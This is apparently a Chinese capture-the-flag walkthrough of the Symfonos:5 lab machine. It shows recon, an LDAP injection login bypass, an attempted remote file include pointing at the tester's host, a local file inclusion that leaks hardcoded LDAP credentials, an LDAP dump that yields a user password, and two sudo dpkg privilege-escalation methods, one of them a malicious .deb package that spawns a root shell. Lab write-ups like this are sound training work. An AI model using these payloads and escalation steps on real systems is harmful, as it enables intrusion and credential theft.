本文内容纯属虚构，攻略鸭求b站关注点赞支持！

(相关资料图)

靶机IP地址：192.168.31.197

测试机IP地址：192.168.31.38

外部信息收集

访问http://192.168.31.197/只有一个图片。

端口扫描

PORT    STATE SERVICE  REASON         VERSION22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))| http-methods: |_  Supported Methods: HEAD GET POST OPTIONS|_http-server-header: Apache/2.4.29 (Ubuntu)389/tcp open  ldap     syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X636/tcp open  ldapssl? syn-ack ttl 63LDAP Results|   <ROOT>|       namingContexts: dc=symfonos,dc=local|       supportedControl: 2.16.840.1.113730.3.4.18...|       supportedSASLMechanisms: GSSAPI|       supportedSASLMechanisms: DIGEST-MD5|       supportedSASLMechanisms: OTP|       supportedSASLMechanisms: NTLM|       supportedSASLMechanisms: CRAM-MD5|_      subschemaSubentry: cn=Subschema

LDAP匿名登录

$ ldapdomaindump 192.168.31.197

失败

网站目录枚举

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.197/FUZZ -e .php,.txt -c.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]home.php                [Status: 302, Size: 979, Words: 117, Lines: 29, Duration: 2ms]admin.php               [Status: 200, Size: 1650, Words: 707, Lines: 40, Duration: 1ms]static                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 0ms]portraits.php           [Status: 200, Size: 165, Words: 10, Lines: 4, Duration: 13ms]server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]

访问http://192.168.31.197/admin.php为登录界面

尝试SQLi

GET /admin.php?username=admin%27or%271&password=asfd

未成功

发现漏洞测试点

(1)敏感信息发现

GET /home.php

返回包：

HTTP/1.1 302 Found

data中看到http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php

(2)LDAP注入

想到存在LDAP服务，尝试LDAP注入。

GET /admin.php?username=*&password=*登录成功发现存在页面http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php修改URL为http://192.168.31.197/home.php?url=http://127.0.0.1/portraits.php

测试文件包含漏洞

尝试RFI

http://192.168.31.197/home.php?url=http://192.168.31.38:8088/reverse.php

发现PHP文件未解析

GET /home.php?url=http://127.0.0.1/admin.php

显示了页面内容，但无PHP

尝试LFI

GET /home.php?url=admin.php

返回包中：

$ldap_ch = ldap_connect("ldap://172.18.0.22");$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");$filter = "(&(uid=$username)(userPassword=$password))";$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);

访问LDAP

通过jxplorer

DN：cn=admin,dc=symfonos,dc=local

密码：qMDdyZh3cT6eeAWD

通过ldapsearch

$ ldapsearch -x -H ldap://192.168.31.197 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'# symfonos.localdn: dc=symfonos,dc=localobjectClass: topobjectClass: dcObjectobjectClass: organizationo: symfonosdc: symfonos# admin, symfonos.localdn: cn=admin,dc=symfonos,dc=localobjectClass: simpleSecurityObjectobjectClass: organizationalRolecn: admindescription: LDAP administratoruserPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=# zeus, symfonos.localdn: uid=zeus,dc=symfonos,dc=localuid: zeuscn: zeussn: 3objectClass: topobjectClass: posixAccountobjectClass: inetOrgPersonloginShell: /bin/bashhomeDirectory: /home/zeusuidNumber: 14583102gidNumber: 14564100userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==mail: zeus@symfonos.localgecos: Zeus User

登录后得到：

cn adminuserPassword:{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVmcn:zeusgecos:Zeus UsergidNumber:14564100homeDirectory:/home/zeusloginShell:/bin/bashmail:zeus@symfonos.localobjectClass:topposixAccountinetOrgPersonsn:3uid:zeusuidNumber:14583102userPassword:cetkKf4wCuHC9FET

通过用户名口令尝试连接SSH

ssh zeus@192.168.31.197zeus@symfonos5:~$ iduid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

sudo提权

$ sudo -lMatching Defaults entries for zeus on symfonos5:   env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser zeus may run the following commands on symfonos5:   (root) NOPASSWD: /usr/bin/dpkg

方法1

$ sudo dpkg -l!/bin/shii  cpio              2.12+dfsg-9         amd64     GNU cpio -- a program to manage archives of filesii  cpp              4:8.3.0-1          amd64     GNU C preprocessor (cpp)ii  cpp-8             8.3.0-6           amd64     GNU C preprocessorii  cron              3.0pl1-134+deb10u1      amd64     process scheduling daemon罗列时在底部输入：!/bin/sh# iduid=0(root) gid=0(root) groups=0(root)

方法2

fpm需要rubygems等，Debian类系统安装:sudo apt-get install ruby ruby-dev rubygems build-essentialsudo gem install --no-document fpmfpm --versiontouch exp.shecho 'exec /bin/sh' > exp.shfpm -n x -s dir -t deb -a all --before-install exp.sh .ls -al-rw-r--r--  1 kali kali 8341274 Feb 21 04:38 x_1.0_all.deb传到靶机$ sudo dpkg -i x_1.0_all.debSelecting previously unselected package x.(Reading database ... 53057 files and directories currently installed.)Preparing to unpack x_1.0_all.deb ...# iduid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat /root/proof.txtCongrats on rooting symfonos:5!

靶机问题

fuzz LDAP和LFI时未成功，错误返回Wrong scheme! You can only use http or https!还十分逼真，以为是过滤了。重新导入虚拟机才可能好。